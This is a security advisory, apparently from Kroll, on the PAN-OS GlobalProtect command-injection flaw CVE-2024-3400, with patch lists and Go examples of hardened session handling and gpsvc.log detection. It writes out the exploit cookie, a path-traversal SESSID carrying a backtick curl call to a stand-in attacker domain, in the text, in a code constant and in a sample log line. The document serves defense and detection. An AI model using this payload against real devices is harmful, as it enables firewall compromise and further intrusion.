On April 16, 2024, watchTowr published a technical breakdown and proof of concept (PoC) for CVE-2024-3400, a command-injection vulnerability in the GlobalProtect feature of PAN-OS, showing how trivial it is to exploit. The issue chains two bugs: the GlobalProtect service uses the session ID from the SESSID cookie, unsanitized, as part of a filename, so a path traversal string in the cookie lets an attacker create a file at an arbitrary path on the device; a command-injection sequence carried in that same filename is then executed by a separate telemetry process. An attacker controls the session ID simply by editing the Cookie header of their request:
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/hour/[arbitrarystring]`curl${IFS}attackerdomain.com`;
This creates an empty file, named with the attacker's string, in the “device_telemetry/hour” directory. The telemetry service processes every file in that directory on an hourly schedule, and because it builds a shell command containing the unsanitized filename, the shell evaluates the backtick substitution and runs the embedded command; in the example above that is a curl request to an attacker-controlled domain. `${IFS}` is the shell's internal field separator and stands in for a literal space, so the payload works without any whitespace in the filename.
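To make the two-stage mechanism concrete, here is an added Go example (not PAN-OS, watchTowr or Kroll code) that walks the published cookie through a filesystem-backed session store and a telemetry uploader, showing the vulnerable pattern next to a hardened one for each stage. The store directory /tmp/sessions, the session_ filename prefix, the upload URL and the accepted session-ID format are assumptions made for the example; the directory depth is chosen so that the three ../ segments in the payload land in /opt, as they do in the text above. Nothing here executes a command; the argv slices are only constructed and inspected.

```go
package main

import (
	"fmt"
	"path/filepath"
	"regexp"
	"strings"
)

// Assumed session store directory (not a PAN-OS path). Two levels deep, so
// the payload's three "../" segments resolve to the filesystem root.
const sessionDir = "/tmp/sessions"

// Constructed request header carrying the payload from the text above.
const attackCookie = "Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/hour/x`curl${IFS}attackerdomain.com`;"

// Session IDs this example accepts: opaque tokens of 32-64 URL-safe characters.
var validSessionID = regexp.MustCompile(`^[A-Za-z0-9_-]{32,64}$`)

// Characters a POSIX shell would interpret if a filename were ever spliced
// into a command string.
const shellMeta = "`$;|&<>(){}'\"\\ \t\n"

// sessionIDFromCookie extracts the SESSID value from a raw "Cookie: ..." header line.
func sessionIDFromCookie(header string) string {
	if _, after, ok := strings.Cut(header, "Cookie:"); ok {
		header = after
	}
	for _, kv := range strings.Split(header, ";") {
		if name, val, ok := strings.Cut(strings.TrimSpace(kv), "="); ok && name == "SESSID" {
			return val
		}
	}
	return ""
}

// vulnerableSessionPath reproduces the unsafe pattern: the raw ID is appended
// to a fixed prefix and the result cleaned. filepath.Join resolves the "../"
// segments instead of rejecting them, so the path escapes sessionDir.
func vulnerableSessionPath(id string) string {
	return filepath.Join(sessionDir, "session_"+id)
}

// safeSessionPath allowlists the ID before it touches the filesystem and then
// double-checks that the resolved path is still inside sessionDir.
func safeSessionPath(id string) (string, error) {
	if !validSessionID.MatchString(id) {
		return "", fmt.Errorf("session id %q rejected: not an opaque token", id)
	}
	p := filepath.Join(sessionDir, "session_"+id)
	if !strings.HasPrefix(p, sessionDir+string(filepath.Separator)) {
		return "", fmt.Errorf("session id %q rejected: resolves outside %s", id, sessionDir)
	}
	return p, nil
}

// telemetryCommandUnsafe reproduces the telemetry-side mistake: the filename
// is spliced into a string handed to "sh -c", so the shell evaluates the
// backtick substitution before curl ever runs.
func telemetryCommandUnsafe(path string) []string {
	return []string{"sh", "-c", "curl -F file=@" + path + " https://telemetry.example/upload"}
}

// telemetryCommandSafe never involves a shell: the filename is one argv
// element, so backticks and ${IFS} are just bytes. As defence in depth it
// also refuses names containing shell metacharacters.
func telemetryCommandSafe(path string) ([]string, error) {
	if strings.ContainsAny(filepath.Base(path), shellMeta) {
		return nil, fmt.Errorf("telemetry file %q rejected: shell metacharacters in name", path)
	}
	return []string{"curl", "-F", "file=@" + path, "https://telemetry.example/upload"}, nil
}

func main() {
	id := sessionIDFromCookie(attackCookie)
	fmt.Println("session id:", id)
	fmt.Println("vulnerable store writes to:", vulnerableSessionPath(id))
	if _, err := safeSessionPath(id); err != nil {
		fmt.Println("hardened store:", err)
	}
	fmt.Printf("unsafe telemetry argv: %q\n", telemetryCommandUnsafe(vulnerableSessionPath(id)))
	if _, err := telemetryCommandSafe(vulnerableSessionPath(id)); err != nil {
		fmt.Println("hardened telemetry:", err)
	}
	good, _ := safeSessionPath("0123456789abcdef0123456789abcdef")
	fmt.Println("benign id resolves to:", good)
}
```

The point of the store-side check is that cleaning a path is not the same as confining it: filepath.Join happily produces /opt/panlogs/... from the payload. The point of the telemetry-side change is that the injection only exists because a shell sees the filename; passing it as its own argv element removes the interpreter entirely, and the metacharacter check is a second layer for the case where some other consumer still shells out.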
How Kroll is Responding
Kroll alerted clients to the threat on Friday, April 12, 2024. Since then, we have responded to suspected compromises surrounding this vulnerability. To address these concerns, our investigators have developed a standardized incident response approach. This includes:
- Collect, preserve and analyze available and relevant log data.
- Collect and review relevant indicators of compromise (IOCs) from the client, where available.
- Compare the client-provided data against Palo Alto and Kroll Cyber Threat Intelligence datasets.
- Provide the client with actionable leads to resolve identified security events, graded by severity (Level 0 through Level 3, following Palo Alto's compromise levels for this vulnerability).
- Work with the client on containment and remediation recommendations.
- Reach out to Kroll via our 24x7 hotlines or contact form for more information on how our incident response team can support you.
Kroll Observations
Kroll has observed active, opportunistic exploitation of CVE-2024-3400 by numerous actors. Because the exploit is trivial and a compromised perimeter firewall is ideally positioned for further intrusion into the network behind it, this vulnerability is a high-priority target for threat actors until affected devices are patched.
Kroll's observations show multiple methods of testing and exploring the vulnerability from a wide, geographically distributed range of IP addresses; these are being actively investigated and have been added to the Kroll IOC detection database. We have not seen evidence of successful exploitation on patched devices.
Palo Alto provides PAN-OS CLI commands in its FAQ to identify indicators of attempted compromise, chiefly a search of the GlobalProtect service log (gpsvc.log) for "failed to unmarshal session(...)" entries whose session value contains a path traversal string; a normal entry of this kind contains only an opaque session ID.
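As an added example (not Kroll's or Palo Alto's tooling), the following Go program applies the same idea offline to constructed gpsvc.log-style lines: it finds "failed to unmarshal session(...)" entries whose session value contains a traversal sequence or shell metacharacters, distinguishes bare probes from drops into the telemetry directory the published exploit targets, and recovers any backtick-embedded command. The timestamp and prefix format of the sample lines is an assumption; only the parenthesised session value is used by the detector.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Constructed sample lines (assumed surrounding format). Line 2 carries the
// payload from the watchTowr write-up, line 3 a bare traversal probe, and
// lines 1 and 4 are benign noise that must not be flagged.
var sampleLog = []string{
	"2024-04-12 03:14:07 gpsvc: failed to unmarshal session(01234567-89ab-cdef-0123-456789abcdef)",
	"2024-04-12 03:15:22 gpsvc: failed to unmarshal session(/../../../opt/panlogs/tmp/device_telemetry/hour/x`curl${IFS}attackerdomain.com`)",
	"2024-04-12 03:16:40 gpsvc: failed to unmarshal session(./../../../../tmp/probe.txt)",
	"2024-04-12 03:17:01 gpsvc: session refreshed for user alice",
}

var (
	sessionRe   = regexp.MustCompile(`failed to unmarshal session\((.*)\)`)
	traversalRe = regexp.MustCompile(`(^|/)\.\.(/|$)`)
	backtickRe  = regexp.MustCompile("`([^`]*)`")
)

// telemetryDir is where the published exploit drops its file; anything
// created there is picked up by the telemetry job, so it is the strongest signal.
const telemetryDir = "/opt/panlogs/tmp/device_telemetry/"

type Finding struct {
	Line          string
	SessionID     string
	TelemetryDrop bool   // traversal lands in the telemetry directory
	Command       string // command embedded in backticks, if any, with ${IFS} expanded
}

// classify returns a Finding for a session-unmarshal failure whose session
// value looks attacker-controlled, and false for benign or unrelated lines.
func classify(line string) (Finding, bool) {
	m := sessionRe.FindStringSubmatch(line)
	if m == nil {
		return Finding{}, false
	}
	id := m[1]
	if !traversalRe.MatchString(id) && !strings.ContainsAny(id, "`$;|") {
		return Finding{}, false // opaque token such as a UUID: expected noise
	}
	f := Finding{Line: line, SessionID: id}
	f.TelemetryDrop = strings.Contains(id, telemetryDir)
	if c := backtickRe.FindStringSubmatch(id); c != nil {
		f.Command = strings.ReplaceAll(c[1], "${IFS}", " ")
	}
	return f, true
}

// scanLog runs classify over every line and collects the hits.
func scanLog(lines []string) []Finding {
	var out []Finding
	for _, l := range lines {
		if f, ok := classify(l); ok {
			out = append(out, f)
		}
	}
	return out
}

func main() {
	for _, f := range scanLog(sampleLog) {
		fmt.Printf("suspicious session value %q telemetry_drop=%t command=%q\n",
			f.SessionID, f.TelemetryDrop, f.Command)
	}
}
```

A traversal that lands somewhere other than the telemetry directory is still worth an investigation (it shows the actor reached the vulnerable handler), but a drop into the telemetry directory combined with an embedded command is the pattern that indicates an attempt at code execution rather than a probe.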
Ongoing Investigation
Security researchers have identified that the path traversal may originate in an open-source Go web toolkit, Gorilla, whose sessions package does not sanitize session IDs before using them in filesystem paths; a fix has since been submitted to the repository. Kroll has not yet independently verified that PAN-OS uses this code, but the Gorilla library itself is certainly vulnerable to path traversal. As of April 18, 2024, no CVE has been assigned to it. Gorilla is used by hundreds of other projects on GitHub and likely in many private codebases as well, so Kroll is continuing to analyze the threat this weakness could pose to other popular projects and products.
Recommendations
Below are some key recommendations from Kroll’s cyber threat intelligence (CTI) team:
- Patch affected Palo Alto devices to a fixed PAN-OS hotfix release immediately (see the release list below).
- Palo Alto customers with a Threat Prevention subscription can block attacks for this vulnerability using Threat IDs 95187, 95189 and 95191 (available in Applications and Threats content version 8836-8695 and later). Please monitor this advisory and new Threat Prevention content updates for additional Threat Prevention IDs around CVE-2024-3400.
- This issue is fixed in hotfix releases of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and in all later PAN-OS versions. Hotfixes for other commonly deployed maintenance releases will also be made available to address this issue. Please see details below for ETAs regarding the upcoming hotfixes.
- PAN-OS 10.2 hotfixes:
  - 10.2.9-h1 (Released 4/14/24)
  - 10.2.8-h3 (Released 4/15/24)
  - 10.2.7-h8 (Released 4/15/24)
  - 10.2.6-h3 (Released 4/16/24)
  - 10.2.5-h6 (Released 4/16/24)
  - 10.2.3-h13 (ETA: 4/17/24)
  - 10.2.1-h2 (ETA: 4/17/24)
  - 10.2.2-h5 (ETA: 4/18/24)
  - 10.2.0-h3 (ETA: 4/18/24)
  - 10.2.4-h16 (ETA: 4/19/24)
- PAN-OS 11.0 hotfixes:
  - 11.0.4-h1 (Released 4/14/24)
  - 11.0.3-h10 (Released 4/16/24)
  - 11.0.2-h4 (Released 4/16/24)
  - 11.0.1-h4 (ETA: 4/17/24)
  - 11.0.0-h3 (ETA: 4/18/24)
- PAN-OS 11.1 hotfixes:
  - 11.1.2-h3 (Released 4/14/24)
  - 11.1.1-h1 (Released 4/16/24)
  - 11.1.0-h3 (Released 4/16/24)